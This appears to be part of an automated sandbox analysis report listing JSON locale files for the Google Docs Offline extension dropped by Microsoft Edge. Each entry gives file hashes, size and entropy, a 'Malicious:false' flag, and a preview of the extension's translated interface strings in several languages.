                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1672
                                                                                                                                                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
